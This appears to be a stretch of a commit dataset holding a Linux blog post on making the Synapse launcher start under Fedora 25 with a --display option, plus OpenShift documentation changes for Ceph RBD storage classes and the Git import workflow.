launcher, solution, terminal, display, wayland, Xorg\n\n## The Problem\n\nOne of the tools I've constantly used when on a Linux distribution is https:\/\/launchpad.net\/synapse-project[Synapse]. It's a really fast application launcher. I've tried https:\/\/github.com\/ManuelSchneid3r\/albert[albert] and others but none have pleased me as much. Since I switched to Fedora25 back in December 2016, I've been using GNOME's built in search which resides in the dashboard. It suffices but the rendering required can cause it to be a bit laggy when resources are being hogged (especially by Chome \ud83d\ude22). So I've decided to install Synapse. Unfortunately after installing, it wouldn't launch from the application menu. I opened Terminix and typed `synapse` only to see it crash from a segmentation fault \ud83e\udd10. I decided to Google search the issue and came across these links:\n\n- https:\/\/ask.fedoraproject.org\/en\/question\/98598\/i-get-a-segmentation-fault-when-starting-synapse-on-fedora-25-what-to-do\/\n- https:\/\/www.reddit.com\/r\/Fedora\/comments\/5j31sd\/synapse_on_fedora_25_fails_with_segmentation\/\n- https:\/\/bugs.launchpad.net\/synapse-project\/+bug\/1592008\n\nUnfotunately everyone was complaining, but no solution.\n\n## The Solution\n\nI figured it was synapse trying to access memory or a stream that doesn't exist. So I checked `syanpse -h` to see what options are available. One of the options available to use `--display`. You can get synapse to successfully start by the following steps.\n\n 1. check the location of the displays you have available: `cd \/tmp\/.X11-unix && for x in X*; do echo \":${x#X}\"; done`\n 2. then, from the locations listed, try using any as arguments to the `--display` option.\n\nFor me, `synapse --display=:0` worked just fine.\n\n**NB: This allows you to manually launch synapse. However, you MAY want to ensure that:**\n\n 1. When you start synapse from the application menu it launches with the options you desire.\n\n * append ` --display=:0` to the end of `Exec=synapse` in the file `\/usr\/share\/applications\/synapse.desktop`.\n * You WILL need **sudo** access to do this. *Be mindful of the space in the string you will be appending.*\n\n 2. If it's autostarted from your startup it is launched with the options you desire.\n * ensure you have **GNOME Tweak Tool** installed. *Install it using `sudo dnf install gnome-tweak-tool` or install it from the **Software** application*. \n * Then navigate: Tweak Tool>Startup Applications>\u2795. Search for Synapse then click \"Add\".\n\n 3. Navigate Settings>Keyboard>\u2795. Enter Name: \"Synapse\", Command: \"synapse --display=:0\", Shortcut: [Whatever keyboard shortcut you desire].\n \nThis should suffice as a solution until a patch is made.\n\n\n[footer]\nThis has been tested on fedora 25. Provide feedback as to whether it works on other distributions that are returning\n```\n[INFO 10:45:12.413170] [synapse-main:266] Starting up...\n[INFO 10:45:12.625883] [synapse-main:208] Binding activation to <Control>space\n[1] 27269 segmentation fault (core dumped) synapse\n```","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8245db6c3a758c10e72cf8e7d4136bea164d70d7","subject":"Added Dynamic Provisioning for Ceph RBD","message":"Added Dynamic Provisioning for Ceph RBD\n\nDynamic provisioning for Ceph RBD was implemented in Kubernetes in PR: https:\/\/github.com\/kubernetes\/kubernetes\/pull\/31251\nSo it is also a part of OpenShift.\n\nThat's why the Ceph RBD dynamic provisioner documentation is added.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/dynamically_provisioning_pvs.adoc","new_file":"install_config\/persistent_storage\/dynamically_provisioning_pvs.adoc","new_contents":"[[install-config-persistent-storage-dynamically-provisioning-pvs]]\n= Dynamic Provisioning and Creating Storage Classes\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nThe *StorageClass* resource object is used to describe and classify storage that can be requested, as well as\nprovide a means for passing in parameters for *dynamically provisioned storage* on-demand. StorageClasses can also serve\nas a management mechanism for controlling different levels of storage and access to the storage. Cluster Administrators (cluster-admin)\nor Storage Administrators (storage-admin) need to define and create the StorageClasses that can then be requested by users without the users needing to have\nany intimate knowledge about the underlying storage volume sources.\n\nThe Kubernetes\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[persistent volume]\nframework enables this functionality and allows administrators to provision a cluster with persistent storage\nand gives users a way to request those resources without having any knowledge of\nthe underlying infrastructure.\n\nMany storage types are available for use as persistent volumes in\n{product-title}. While all of them can be statically provisioned by an\nadministrator, some types of storage can be created dynamically using the built in provider and plug-in APIs.\n\n\n[[available-dynamically-provisioned-plug-ins]]\n== Available Dynamically Provisioned Plug-ins\n\n{product-title} provides the following _provisioner plug-ins_, which have\ngeneric implementations for dynamic provisioning that use the cluster's\nconfigured provider's API to create new storage resources:\n\n\n[options=\"header\"]\n|===\n\n|Storage Type |Provisioner Plug-in Name |Required Configuration| Notes\n\n|OpenStack Cinder\n|`kubernetes.io\/cinder`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|AWS Elastic Block Store (EBS)\n|`kubernetes.io\/aws-ebs`\n|xref:..\/..\/install_config\/configuring_aws.adoc#install-config-configuring-aws[Configuring for AWS]\n|For dynamic provisioning when using multiple clusters in different zones, each\nnode must be tagged with `*Key=KubernetesCluster,Value=clusterid*`.\n\n|GCE Persistent Disk (gcePD)\n|`kubernetes.io\/gce-pd`\n|xref:..\/..\/install_config\/configuring_gce.adoc#install-config-configuring-gce[Configuring for GCE]\n|In multi-zone configurations, PVs must be created in the same region\/zone as\nthe master node. Do this by setting the\n`*failure-domain.beta.kubernetes.io\/region*` and\n`*failure-domain.beta.kubernetes.io\/zone*` PV labels to match the master node.\n\n|GlusterFS\n|`kubernetes.io\/glusterfs`\n|link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[Container Native Storage with GlusterFS]\n|Container Native Storage (CNS) utilizes heketi to manage Gluster Storage\n\n|Ceph RBD\n|`kubernetes.io\/rbd`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|===\n\n\n[IMPORTANT]\n====\nFor any chosen provisioner plug-ins, any relevant cloud, host or third-party configurations must also\nbe set up, per provider required documentation.\n====\n\n[[defining-storage-classes]]\n== Defining a StorageClass\n\nStorageClasses are currently a globally scoped object and need to be created by cluster-admins or\nstorage-admins.\nThere are currently five plug-ins that are supported. Below sections will\ndescribe the basic Spec definition for a _StorageClass_ and specific examples for each of the supported plug-in types.\n\n[[basic-spec-defintion]]\n=== Basic StorageClass Spec Definition\n\n.StorageClass Basic Spec Definition\n====\n[source,yaml]\n----\nkind: StorageClass <1>\napiVersion: storage.k8s.io\/v1beta1 <2>\nmetadata:\n name: foo <3>\n annotations: <4>\n ...\nprovisioner: kubernetes.io\/plug-in-type <5>\nparameters: <6>\n param1: value\n ...\n paramN: value\n\n----\n<1> (required) The API object type.\n<2> (required) The current apiVersion.\n<3> (required) The name of the StorageClass.\n<4> (optional) Annotations for the StorageClass\n<5> (required) The type of provisioner associated with this storage class.\n<6> (optional) The parameters required for the specific provisioner, this will change\nfrom plug-in to plug-in.\n====\n\n[[storage-class-annotations]]\n=== StorageClass Annotations\n\n- Setting a _StorageClass_ as the cluster wide default _StorageClass_. This will enable any Persistent Volume Claim (PVC)\nthat does not specify a specific volume to automatically be provisioned via the _default_ StorageClass\n----\n storageclass.beta.kubernetes.io\/is-default-class: \"true\"\n----\n\n- Setting a _StorageClass_ description\n----\n kubernetes.io\/description: My StorgeClass Description\n----\n\n\n[[openstack-cinder-spec]]\n=== OpenStack Cinder Spec\n\n.cinder-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: gold\nprovisioner: kubernetes.io\/cinder\nparameters:\n type: fast <1>\n availability: nova <2>\n\n----\n<1> VolumeType created in Cinder. Default is empty.\n<2> Availability Zone. Default is empty.\n====\n\n[[aws-elasticblockstore-ebs]]\n=== AWS ElasticBlockStore (EBS)\n\n.aws-ebs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/aws-ebs\nparameters:\n type: io1 <1>\n zone: us-east-1d <2>\n iopsPerGB: \"10\" <3>\n encrypted: true <4>\n kmsKeyId: keyvalue <5>\n\n----\n\n<1> io1, gp2, sc1, st1. See AWS docs for details. Default: gp2.\n<2> AWS zone. If not specified, a random zone from those where Kubernetes cluster has a node is chosen.\n<3> only for io1 volumes. I\/O operations per second per GiB. AWS volume plug-in multiplies this with size of requested volume to compute IOPS of the volume and caps it at 20 000 IOPS (maximum supported by AWS, see AWS docs).\n<4> denotes whether the EBS volume should be encrypted or not. Valid values are true or false.\n<5> (optional) The full Amazon Resource Name (ARN) of the key to use when encrypting the volume. If none is supplied but encrypted is true, a key is generated by AWS. link:http:\/\/docs.aws.amazon.com\/general\/latest\/gr\/aws-arns-and-namespaces.html[See AWS docs for valid ARN value].\n====\n\n[[gce-persistentdisk-gcePd]]\n=== GCE PersistentDisk (gcePD)\n\n.gce-pd-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/gce-pd\nparameters:\n type: pd-standard <1>\n zone: us-central1-a <2>\n\n----\n\n<1> pd-standard or pd-ssd. Default: pd-ssd\n<2> GCE zone. If not specified, a random zone in the same region as controller-manager will be chosen.\n====\n\n[[glusterfs]]\n=== GlusterFS\n\n.glusterfs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/glusterfs\nparameters:\n endpoint: \"glusterfs-cluster\" <1>\n resturl: \"http:\/\/127.0.0.1:8081\" <2>\n restauthenabled: \"true\" <3>\n restuser: \"admin\" <4>\n restuserkey: \"password\" <5>\n\n----\n\n<1> glusterfs-cluster is the endpoint name which includes GlusterFS trusted pool IP addresses. This parameter is mandatory. We need to also create a service for this endpoint, so that the endpoint will be persisted. This service can be without a selector to tell Kubernetes that the endpoints will be added manually. Please note that, glusterfs plug-in looks for the endpoint in the pod namespace, so it is mandatory that the endpoint and service have to be created in Pod's namespace for successful mount of gluster volumes in the pod.\n<2> Gluster REST service\/Heketi service url which provision gluster volumes on demand. The general format should be IPaddress:Port and this is a mandatory parameter for GlusterFS dynamic provisioner. If Heketi service is exposed as a routable service in openshift\/kubernetes setup, it will have a resolvable fully qualified domain name and heketi service url. link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[For additional information and configuration]\n<3> Gluster REST service\/Heketi user who has access to create volumes in the Gluster Trusted Pool.\n<4> Gluster REST service\/Heketi user's password which will be used for authentication to the REST server. This parameter is deprecated in favor of secretNamespace + secretName.\n<5> Identification of Secret instance that containes user password to use when talking to Gluster REST service. These parameters are optional, empty password will be used when both secretNamespace and secretName are omitted.\n====\n\n[[ceph-persistentdisk-cephRBD]]\n=== Ceph RBD\n\n.ceph-storageclass.yaml\n====\n[source,yaml]\n----\napiVersion: storage.k8s.io\/v1beta1\nkind: StorageClass\nmetadata:\n name: fast\nprovisioner: kubernetes.io\/rbd\nparameters:\n monitors: 10.16.153.105:6789 <1>\n adminId: kube <2>\n adminSecretName: ceph-secret <3>\n adminSecretNamespace: kube-system <4>\n pool: kube <5>\n userId: kube <6>\n userSecretName: ceph-secret-user <7>\n\n----\n\n<1> Ceph monitors, comma delimited. It is required.\n<2> Ceph client ID that is capable of creating images in the pool. Default is \"admin\".\n<3> Secret Name for `adminId`. It is required. The provided secret must have type \"kubernetes.io\/rbd\".\n<4> The namespace for `adminSecret`. Default is \"default\".\n<5> Ceph RBD pool. Default is \"rbd\".\n<6> Ceph client ID that is used to map the RBD image. Default is the same as `adminId`.\n<7> The name of Ceph Secret for `userId` to map RBD image. It must exist in the same namespace as PVCs. It is required.\n====\n\n[[moreinfo]]\n== Additional Information and Examples\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_dynamic_provisioning.adoc#install-config-storage-examples-storage-classes-dynamic-provisioning[Examples and uses of StorageClasses for Dynamic Provisioning]\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_legacy.adoc#install-config-storage-examples-storage-classes-legacy[Examples and uses of StorageClasses without Dynamic Provisioning]\n","old_contents":"[[install-config-persistent-storage-dynamically-provisioning-pvs]]\n= Dynamic Provisioning and Creating Storage Classes\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nThe *StorageClass* resource object is used to describe and classify storage that can be requested, as well as\nprovide a means for passing in parameters for *dynamically provisioned storage* on-demand. StorageClasses can also serve\nas a management mechanism for controlling different levels of storage and access to the storage. Cluster Administrators (cluster-admin)\nor Storage Administrators (storage-admin) need to define and create the StorageClasses that can then be requested by users without the users needing to have\nany intimate knowledge about the underlying storage volume sources.\n\nThe Kubernetes\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[persistent volume]\nframework enables this functionality and allows administrators to provision a cluster with persistent storage\nand gives users a way to request those resources without having any knowledge of\nthe underlying infrastructure.\n\nMany storage types are available for use as persistent volumes in\n{product-title}. While all of them can be statically provisioned by an\nadministrator, some types of storage can be created dynamically using the built in provider and plug-in APIs.\n\n\n[[available-dynamically-provisioned-plug-ins]]\n== Available Dynamically Provisioned Plug-ins\n\n{product-title} provides the following _provisioner plug-ins_, which have\ngeneric implementations for dynamic provisioning that use the cluster's\nconfigured provider's API to create new storage resources:\n\n\n[options=\"header\"]\n|===\n\n|Storage Type |Provisioner Plug-in Name |Required Configuration| Notes\n\n|OpenStack Cinder\n|`kubernetes.io\/cinder`\n|xref:..\/..\/install_config\/configuring_openstack.adoc#install-config-configuring-openstack[Configuring for OpenStack]\n|\n\n|AWS Elastic Block Store (EBS)\n|`kubernetes.io\/aws-ebs`\n|xref:..\/..\/install_config\/configuring_aws.adoc#install-config-configuring-aws[Configuring for AWS]\n|For dynamic provisioning when using multiple clusters in different zones, each\nnode must be tagged with `*Key=KubernetesCluster,Value=clusterid*`.\n\n|GCE Persistent Disk (gcePD)\n|`kubernetes.io\/gce-pd`\n|xref:..\/..\/install_config\/configuring_gce.adoc#install-config-configuring-gce[Configuring for GCE]\n|In multi-zone configurations, PVs must be created in the same region\/zone as\nthe master node. Do this by setting the\n`*failure-domain.beta.kubernetes.io\/region*` and\n`*failure-domain.beta.kubernetes.io\/zone*` PV labels to match the master node.\n\n|GlusterFS\n|`kubernetes.io\/glusterfs`\n|link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[Container Native Storage with GlusterFS]\n|Container Native Storage (CNS) utilizes heketi to manage Gluster Storage\n\n|===\n\n\n[IMPORTANT]\n====\nFor any chosen provisioner plug-ins, any relevant cloud, host or third-party configurations must also\nbe set up, per provider required documentation.\n====\n\n[[defining-storage-classes]]\n== Defining a StorageClass\n\nStorageClasses are currently a globally scoped object and need to be created by cluster-admins or\nstorage-admins.\nThere are currently five plug-ins that are supported. Below sections will\ndescribe the basic Spec definition for a _StorageClass_ and specific examples for each of the supported plug-in types.\n\n[[basic-spec-defintion]]\n=== Basic StorageClass Spec Definition\n\n.StorageClass Basic Spec Definition\n====\n[source,yaml]\n----\nkind: StorageClass <1>\napiVersion: storage.k8s.io\/v1beta1 <2>\nmetadata:\n name: foo <3>\n annotations: <4>\n ...\nprovisioner: kubernetes.io\/plug-in-type <5>\nparameters: <6>\n param1: value\n ...\n paramN: value\n\n----\n<1> (required) The API object type.\n<2> (required) The current apiVersion.\n<3> (required) The name of the StorageClass.\n<4> (optional) Annotations for the StorageClass\n<5> (required) The type of provisioner associated with this storage class.\n<6> (optional) The parameters required for the specific provisioner, this will change\nfrom plug-in to plug-in.\n====\n\n[[storage-class-annotations]]\n=== StorageClass Annotations\n\n- Setting a _StorageClass_ as the cluster wide default _StorageClass_. This will enable any Persistent Volume Claim (PVC)\nthat does not specify a specific volume to automatically be provisioned via the _default_ StorageClass\n----\n storageclass.beta.kubernetes.io\/is-default-class: \"true\"\n----\n\n- Setting a _StorageClass_ description\n----\n kubernetes.io\/description: My StorgeClass Description\n----\n\n\n[[openstack-cinder-spec]]\n=== OpenStack Cinder Spec\n\n.cinder-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: gold\nprovisioner: kubernetes.io\/cinder\nparameters:\n type: fast <1>\n availability: nova <2>\n\n----\n<1> VolumeType created in Cinder. Default is empty.\n<2> Availability Zone. Default is empty.\n====\n\n[[aws-elasticblockstore-ebs]]\n=== AWS ElasticBlockStore (EBS)\n\n.aws-ebs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/aws-ebs\nparameters:\n type: io1 <1>\n zone: us-east-1d <2>\n iopsPerGB: \"10\" <3>\n encrypted: true <4>\n kmsKeyId: keyvalue <5>\n\n----\n\n<1> io1, gp2, sc1, st1. See AWS docs for details. Default: gp2.\n<2> AWS zone. If not specified, a random zone from those where Kubernetes cluster has a node is chosen.\n<3> only for io1 volumes. I\/O operations per second per GiB. AWS volume plug-in multiplies this with size of requested volume to compute IOPS of the volume and caps it at 20 000 IOPS (maximum supported by AWS, see AWS docs).\n<4> denotes whether the EBS volume should be encrypted or not. Valid values are true or false.\n<5> (optional) The full Amazon Resource Name (ARN) of the key to use when encrypting the volume. If none is supplied but encrypted is true, a key is generated by AWS. link:http:\/\/docs.aws.amazon.com\/general\/latest\/gr\/aws-arns-and-namespaces.html[See AWS docs for valid ARN value].\n====\n\n[[gce-persistentdisk-gcePd]]\n=== GCE PersistentDisk (gcePD)\n\n.gce-pd-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/gce-pd\nparameters:\n type: pd-standard <1>\n zone: us-central1-a <2>\n\n----\n\n<1> pd-standard or pd-ssd. Default: pd-ssd\n<2> GCE zone. If not specified, a random zone in the same region as controller-manager will be chosen.\n====\n\n[[glusterfs]]\n=== GlusterFS\n\n.glusterfs-storageclass.yaml\n====\n[source,yaml]\n----\nkind: StorageClass\napiVersion: storage.k8s.io\/v1beta1\nmetadata:\n name: slow\nprovisioner: kubernetes.io\/glusterfs\nparameters:\n endpoint: \"glusterfs-cluster\" <1>\n resturl: \"http:\/\/127.0.0.1:8081\" <2>\n restauthenabled: \"true\" <3>\n restuser: \"admin\" <4>\n restuserkey: \"password\" <5>\n\n----\n\n<1> glusterfs-cluster is the endpoint name which includes GlusterFS trusted pool IP addresses. This parameter is mandatory. We need to also create a service for this endpoint, so that the endpoint will be persisted. This service can be without a selector to tell Kubernetes that the endpoints will be added manually. Please note that, glusterfs plug-in looks for the endpoint in the pod namespace, so it is mandatory that the endpoint and service have to be created in Pod's namespace for successful mount of gluster volumes in the pod.\n<2> Gluster REST service\/Heketi service url which provision gluster volumes on demand. The general format should be IPaddress:Port and this is a mandatory parameter for GlusterFS dynamic provisioner. If Heketi service is exposed as a routable service in openshift\/kubernetes setup, it will have a resolvable fully qualified domain name and heketi service url. link:https:\/\/access.redhat.com\/documentation\/en\/red-hat-gluster-storage\/3.1\/single\/container-native-storage-for-openshift-container-platform\/[For additional information and configuration]\n<3> Gluster REST service\/Heketi user who has access to create volumes in the Gluster Trusted Pool.\n<4> Gluster REST service\/Heketi user's password which will be used for authentication to the REST server. This parameter is deprecated in favor of secretNamespace + secretName.\n<5> Identification of Secret instance that containes user password to use when talking to Gluster REST service. These parameters are optional, empty password will be used when both secretNamespace and secretName are omitted.\n====\n\n[[moreinfo]]\n== Additional Information and Examples\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_dynamic_provisioning.adoc#install-config-storage-examples-storage-classes-dynamic-provisioning[Examples and uses of StorageClasses for Dynamic Provisioning]\n\n- xref:..\/..\/install_config\/storage_examples\/storage_classes_legacy.adoc#install-config-storage-examples-storage-classes-legacy[Examples and uses of StorageClasses without Dynamic Provisioning]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd8e38ef53766e2a94934179e9dfa007cb80609a","subject":"RHDEVDOCS-3619: Update the creating applications flow as per the latest UI changes","message":"RHDEVDOCS-3619: Update the creating applications flow as per the latest UI changes\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/odc-importing-codebase-from-git-to-create-application.adoc","new_file":"modules\/odc-importing-codebase-from-git-to-create-application.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * applications\/creating_applications\/odc-creating-applications-using-developer-perspective.adoc\n\n:_content-type: PROCEDURE\n[id=\"odc-importing-codebase-from-git-to-create-application_{context}\"]\n= Importing a codebase from Git to create an application\n\nYou can use the *Developer* perspective to create, build, and deploy an application on {product-title} using an existing codebase in GitHub.\n\nThe following procedure walks you through the *From Git* option in the *Developer* perspective to create an application.\n\n.Procedure\n\n. In the *+Add* view, click *From Git* in the *Git Repository* tile to see the *Import from git* form.\n. In the *Git* section, enter the Git repository URL for the codebase you want to use to create an application. For example, enter the URL of this sample Node.js application `\\https:\/\/github.com\/sclorg\/nodejs-ex`. The URL is then validated.\n. Optional: You can click *Show Advanced Git Options* to add details such as:\n\n* *Git Reference* to point to code in a specific branch, tag, or commit to be used to build the application.\n* *Context Dir* to specify the subdirectory for the application source code you want to use to build the application.\n* *Source Secret* to create a *Secret Name* with credentials for pulling your source code from a private repository.\n\n. Optional: You can import a devfile, a Dockerfile, or a builder image through your Git repository to further customize your deployment.\n* If your Git repository contains a devfile, a Dockerfile, or a builder image, it is automatically detected and populated on the respective path fields. If a devfile, a Dockerfile, and a builder image are detected in the same repository, the devfile is selected by default.\n* To edit the file import type and select a different strategy, click *Edit import strategy* option.\n* If multiple devfiles, Dockerfiles, or builder images are detected, to import a specific devfile, Dockerfile, or a builder image, specify the respective paths relative to the context directory.\n\n. After the Git URL is validated, the recommended builder image is selected and marked with a star. If the builder image is not auto-detected, select a builder image. For the `https:\/\/github.com\/sclorg\/nodejs-ex` Git URL, by default the Node.js builder image is selected.\n.. Optional: Use the *Builder Image Version* drop-down to specify a version.\n.. Optional: Use the *Edit import strategy* to select a different strategy.\n.. Optional: For the Node.js builder image, use the **Run command** field to override the command to run the application.\n\n. In the *General* section:\n.. In the *Application* field, enter a unique name for the application grouping, for example, `myapp`. Ensure that the application name is unique in a namespace.\n.. The *Name* field to identify the resources created for this application is automatically populated based on the Git repository URL if there are no existing applications. If there are existing applications, you can choose to deploy the component within an existing application, create a new application, or keep the component unassigned.\n+\n[NOTE]\n====\nThe resource name must be unique in a namespace. Modify the resource name if you get an error.\n====\n\n. In the *Resources* section, select:\n\n* *Deployment*, to create an application in plain Kubernetes style.\n* *Deployment Config*, to create an {product-title} style application.\n* *Serverless Deployment*, to create a Knative service.\n+\n[NOTE]\n====\nThe *Serverless Deployment* option is displayed in the *Import from git* form only if the {ServerlessOperatorName} is installed in your cluster. For further details, refer to the {ServerlessProductName} documentation.\n====\n\n. In the *Pipelines* section, select *Add Pipeline*, and then click *Show Pipeline Visualization* to see the pipeline for the application.\n\n. Optional: In the *Advanced Options* section, the *Target port* and the *Create a route to the application* is selected by default so that you can access your application using a publicly available URL.\n+\nIf your application does not expose its data on the default public port, 80, clear the check box, and set the target port number you want to expose.\n\n. Optional: You can use the following advanced options to further customize your application:\n\ninclude::snippets\/routing-odc.adoc[]\ninclude::snippets\/serverless-domain-mapping-odc.adoc[]\n\nHealth Checks::\nClick the *Health Checks* link to add Readiness, Liveness, and Startup probes to your application. All the probes have prepopulated default data; you can add the probes with the default data or customize it as required.\n+\nTo customize the health probes:\n+\n* Click *Add Readiness Probe*, if required, modify the parameters to check if the container is ready to handle requests, and select the check mark to add the probe.\n* Click *Add Liveness Probe*, if required, modify the parameters to check if a container is still running, and select the check mark to add the probe.\n* Click *Add Startup Probe*, if required, modify the parameters to check if the application within the container has started, and select the check mark to add the probe.\n+\nFor each of the probes, you can specify the request type - *HTTP GET*, *Container Command*, or *TCP Socket*, from the drop-down list. The form changes as per the selected request type. You can then modify the default values for the other parameters, such as the success and failure thresholds for the probe, number of seconds before performing the first probe after the container starts, frequency of the probe, and the timeout value.\n\nBuild Configuration and Deployment::\nClick the *Build Configuration* and *Deployment* links to see the respective configuration options. Some options are selected by default; you can customize them further by adding the necessary triggers and environment variables.\n+\nFor serverless applications, the *Deployment* option is not displayed as the Knative configuration resource maintains the desired state for your deployment instead of a `DeploymentConfig` resource.\n\ninclude::snippets\/scaling-odc.adoc[]\n\nResource Limit::\nClick the *Resource Limit* link to set the amount of *CPU* and *Memory* resources a container is guaranteed or allowed to use when running.\n\nLabels::\nClick the *Labels* link to add custom labels to your application.\n\n. Click *Create* to create the application and a success notification is displayed. You can see the build status of the application in the *Topology* view.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * applications\/creating_applications\/odc-creating-applications-using-developer-perspective.adoc\n\n:_content-type: PROCEDURE\n[id=\"odc-importing-codebase-from-git-to-create-application_{context}\"]\n= Importing a codebase from Git to create an application\n\nYou can use the *Developer* perspective to create, build, and deploy an application on {product-title} using an existing codebase in GitHub.\n\nThe following procedure walks you through the *From Git* option in the *Developer* perspective to create an application.\n\n.Procedure\n\n. In the *+Add* view, click *From Git* in the *Git Repository* tile to see the *Import from git* form.\n. In the *Git* section, enter the Git repository URL for the codebase you want to use to create an application. For example, enter the URL of this sample Node.js application `\\https:\/\/github.com\/sclorg\/nodejs-ex`. The URL is then validated.\n. Optional: You can click *Show Advanced Git Options* to add details such as:\n\n* *Git Reference* to point to code in a specific branch, tag, or commit to be used to build the application.\n* *Context Dir* to specify the subdirectory for the application source code you want to use to build the application.\n* *Source Secret* to create a *Secret Name* with credentials for pulling your source code from a private repository.\n\n. Optional: You can import a devfile, a Dockerfile, or a builder image through your Git repository to further customize your deployment.\n* If your Git repository contains a devfile, a Dockerfile, or a builder image, it is automatically detected and populated on the respective path fields. If a devfile, a Dockerfile, and a builder image are detected in the same repository, the devfile is selected by default.\n* To edit the file import type and select a different strategy, click *Edit import strategy* option.\n* If multiple devfiles, Dockerfiles, or builder images are detected, to import a specific devfile, Dockerfile, or a builder image, specify the respective paths relative to the context directory.\n\n. After the Git URL is validated, the recommended builder image is selected and marked with a star. If the builder image is not auto-detected, select a builder image. For the `https:\/\/github.com\/sclorg\/nodejs-ex` Git URL, by default the Node.js builder image is selected.\n.. Optional: Use the *Builder Image Version* drop-down to specify a version.\n.. Optional: Use the *Edit import strategy* to select a different strategy.\n\n. In the *General* section:\n.. In the *Application* field, enter a unique name for the application grouping, for example, `myapp`. Ensure that the application name is unique in a namespace.\n.. The *Name* field to identify the resources created for this application is automatically populated based on the Git repository URL if there are no existing applications. If there are existing applications, you can choose to deploy the component within an existing application, create a new application, or keep the component unassigned.\n+\n[NOTE]\n====\nThe resource name must be unique in a namespace. Modify the resource name if you get an error.\n====\n\n. In the *Resources* section, select:\n\n* *Deployment*, to create an application in plain Kubernetes style.\n* *Deployment Config*, to create an {product-title} style application.\n* *Serverless Deployment*, to create a Knative service.\n+\n[NOTE]\n====\nThe *Serverless Deployment* option is displayed in the *Import from git* form only if the {ServerlessOperatorName} is installed in your cluster. For further details, refer to the {ServerlessProductName} documentation.\n====\n\n. In the *Pipelines* section, select *Add Pipeline*, and then click *Show Pipeline Visualization* to see the pipeline for the application.\n\n. In the *Advanced Options* section, the *Create a route to the application* is selected by default so that you can access your application using a publicly available URL. You can clear the check box if you do not want to expose your application on a public route.\n\n. Optional: You can use the following advanced options to further customize your application:\n\ninclude::snippets\/routing-odc.adoc[]\ninclude::snippets\/serverless-domain-mapping-odc.adoc[]\n\nHealth Checks::\nClick the *Health Checks* link to add Readiness, Liveness, and Startup probes to your application. All the probes have prepopulated default data; you can add the probes with the default data or customize it as required.\n+\nTo customize the health probes:\n+\n* Click *Add Readiness Probe*, if required, modify the parameters to check if the container is ready to handle requests, and select the check mark to add the probe.\n* Click *Add Liveness Probe*, if required, modify the parameters to check if a container is still running, and select the check mark to add the probe.\n* Click *Add Startup Probe*, if required, modify the parameters to check if the application within the container has started, and select the check mark to add the probe.\n+\nFor each of the probes, you can specify the request type - *HTTP GET*, *Container Command*, or *TCP Socket*, from the drop-down list. The form changes as per the selected request type. You can then modify the default values for the other parameters, such as the success and failure thresholds for the probe, number of seconds before performing the first probe after the container starts, frequency of the probe, and the timeout value.\n\nBuild Configuration and Deployment::\nClick the *Build Configuration* and *Deployment* links to see the respective configuration options. Some options are selected by default; you can customize them further by adding the necessary triggers and environment variables.\n+\nFor serverless applications, the *Deployment* option is not displayed as the Knative configuration resource maintains the desired state for your deployment instead of a `DeploymentConfig` resource.\n\ninclude::snippets\/scaling-odc.adoc[]\n\nResource Limit::\nClick the *Resource Limit* link to set the amount of *CPU* and *Memory* resources a container is guaranteed or allowed to use when running.\n\nLabels::\nClick the *Labels* link to add custom labels to your application.\n\n. Click *Create* to create the application and see its build status in the *Topology* view.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"771b4267a2388b3fb40141cae402d902fa5cb121","subject":"Updated multi-cluster architecture scenario as per feedback","message":"Updated multi-cluster architecture scenario as per 